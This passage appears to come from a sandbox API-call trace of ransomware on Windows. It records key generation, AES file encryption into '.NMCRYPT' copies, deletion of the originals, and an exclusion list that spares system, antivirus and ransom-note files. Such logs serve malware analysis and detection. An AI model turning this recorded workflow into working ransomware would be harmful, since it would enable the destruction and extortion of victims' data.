pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.004] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0148.004] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0148.005] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0148.005] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.005] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad878) returned 1 [0148.005] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0148.005] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0148.005] wcslen (_String="\\\\?\\") returned 0x4 [0148.005] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0148.005] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.005] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.005] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2596) returned 1 [0148.005] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0148.006] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.006] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.007] GetLastError () returned 0x0 [0148.007] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.010] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.010] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.010] GetLastError () returned 0x0 [0148.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.010] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.010] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.010] GetLastError () returned 0x0 [0148.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.010] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.010] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.010] GetLastError () returned 0x0 [0148.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.011] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.011] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.011] GetLastError () returned 0x0 [0148.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.011] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.011] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.011] GetLastError () returned 0x0 [0148.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.011] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.011] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.011] GetLastError () returned 0x0 [0148.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.011] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.011] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.011] GetLastError () returned 0x0 [0148.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.011] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.011] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.011] GetLastError () returned 0x0 [0148.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.011] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.011] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.011] GetLastError () returned 0x0 [0148.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.011] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x24, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x24, lpOverlapped=0x0) returned 1 [0148.012] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x24, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x30) returned 1 [0148.012] GetLastError () returned 0x0 [0148.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x30, lpOverlapped=0x0) returned 1 [0148.012] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0148.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0148.012] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml")) returned 0x20 [0148.012] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml", dwFileAttributes=0x20) returned 0 [0148.012] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 1 [0148.012] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml")) returned 0 [0148.013] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" [0148.013] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0148.013] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB521.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb521.tmp")) returned 0xb521 [0148.013] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB521.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb521.tmp"), dwFlags=0x1) returned 0 [0148.013] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB521.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb521.tmp")) returned 1 [0148.014] CryptDestroyKey (hKey=0x9ad138) returned 1 [0148.014] wcslen (_String="OK") returned 0x2 [0148.014] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.014] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.014] CryptDestroyKey (hKey=0x9ad878) returned 1 [0148.014] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0148.014] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0148.014] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*NMCRYPT") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*Recovers your files.html") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*.exe") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*.dll") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*.lnk") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*.bat") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*.ini") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*.msi") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*.scf") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*pagefile.sys*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*NTUSER.DAT*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*AppData*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\winrar\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\java\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\windows\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\ESET\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\AVG\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\AVIRA\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*Atheros*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*Realtek*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*bootmgr*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*boot*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*boot*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*CONFIG.SYS*") returned 0 [0148.014] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*IO.SYS*") returned 0 [0148.015] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*MSDOS.SYS*") returned 0 [0148.015] PathMatchSpecW 